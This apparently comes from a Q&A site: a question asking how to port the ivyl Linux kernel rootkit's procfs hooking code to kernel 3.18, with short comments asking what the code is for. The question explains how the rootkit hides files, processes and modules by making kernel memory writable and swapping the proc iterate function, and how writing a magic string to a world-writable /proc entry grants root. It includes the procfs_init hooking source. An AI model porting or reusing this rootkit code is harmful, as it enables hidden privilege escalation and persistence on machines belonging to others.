# Migrating dir_proc_entry from kernel 3.1 to kernel 3.18

Tags: linux, linux-kernel

I'm migrating a kernel module from 3.1 to 3.18. `struct dir_proc_entry` definition was moved to `fs/proc/internal.h`. How do I use this structure now in the new version? When I tried to include `internal.h` I got an error that it doesn't exist.

```
fatal error: fs/proc/internal.h: No such file or directory
```

Is there something I'm missing to work with `dir_proc_entry`? I read that this structure was made opaque in 3.10. What is the proper way to work with this?

In my code for example I have:

```
static struct proc_dir_entry *proc01;

...
parent = proc01->parent;
```

What is the proper way to work with `proc_dir_entry`?

What I'm trying to do is EXACTLY this: [dereferencing proc_dir_entry pointer causing compilation error on linux version 3.11 and above](https://stackoverflow.com/questions/24197218/dereferencing-proc-dir-entry-pointer-causing-compilation-error-on-linux-version)

I made the exact same modifications as the code listed on my own. The only changes are that I'm using newer/different kernel headers now.

Here is how ivyl rootkit works.

- The kernel module initializes with __init rootkit_init(void).

  - Run both procfs_init or fs_init

    - Both of these functions replace the readdir (for kernels 3.10 and older) or iterate (for kernels 3.11 and newer) with a custom version. This is the hiding functionality of a rootkit. They work by making memory read/write replacing the function then making the memory read only.
    - procfs_init operates on the process filesystem. It creates a file that is read/write by everyone called rtkit. It replaces the original readdir (iterate) with the new one that hides rtkit from view.
    - fs_init operates on the filesystem in /etc. This is where the module is stored. In other words, it hides the executable code.
- The code in procfs_init is what relies on proc_dir_entry structure. This code does the following in detail (line by line):

  - Creates an entry for the process "rtkit" that is read/write by everyone.
  - Error checking – if the process is not created return 0.
  - Get the parent process.
  - Error checking – if parent is null or the parent process is not "/proc" return 0.
  - Set the read function of the rtkit process – this just prints some information about what the rootkit is doing. A kind of help command.
  - Set the write function of the rtkit process. This is main function that brings everything together. It looks for the code "mypenislong" and changes to root. The user running this rootkit now has full root privileges. It also hides given processes and given modules as per the command given.
  - Get a file operations structure (file_operations) for the root process (proc_root)
  - From the file operations get the original readdir (iterate) function.
  - Set the proc_fops to read/write
  - Set the proc_fops iterate member to the new function of the rootkit (the one that hides functionality)
  - Set the proc_fops back to read only.
  - Return 1.

The code for procfs_init:

```
static int __init procfs_init(void)  
{  
  //new entry in proc root with 666 rights  
  proc_rtkit = create_proc_entry("rtkit", 0666, NULL);  
  if (proc_rtkit == NULL) return 0;  
  proc_root = proc_rtkit->parent;  
  if (proc_root == NULL || strcmp(proc_root->name, "/proc") != 0) {  
    return 0;  
  }  
  proc_rtkit->read_proc = rtkit_read;  
  proc_rtkit->write_proc = rtkit_write;  

  //substitute proc readdir to our wersion (using page mode change)  
  proc_fops = ((struct file_operations *) proc_root->proc_fops);  
  proc_readdir_orig = proc_fops->iterate;  
  set_addr_rw(proc_fops);  
  proc_fops->iterate = proc_readdir_new;  
  set_addr_ro(proc_fops);  

  return 1;  
}
```

Since the dir_proc_entry structure is now opaque, how do I replace the functionality of this code? I need the code to read/write processes so that the process can be hidden as required.

Edit: modified question title and removed extraneous statement. Added clarification on what I'm trying to do.

Edit: Added description of ivyl rootkit workings.

Comment: `What is the proper way to work with this?` - Proper way is to use it as opaque structure, that is do not access its fields. The header `fs/proc/internal.h` is internal for procfs implementation. The access to `.parent` field of the struct is insufficient for suggest migration path - you need to describe **why** do you need this value, that is, what do you want to achieve eventually.

Comment: BTW, current question title is about `struct file_operations`, but the question doesn't note this struct at all.

Comment: Thanks--I've updated the question a bit with some clarification.

Comment: Well, if you insist on getting the `.parent` field, then you cannot do that; also there is no (non-internal) interface which provides content of this field for you. But there could be a way for achieve the same things, which original code does by using this field. But you haven't describe what original code wants to achieve.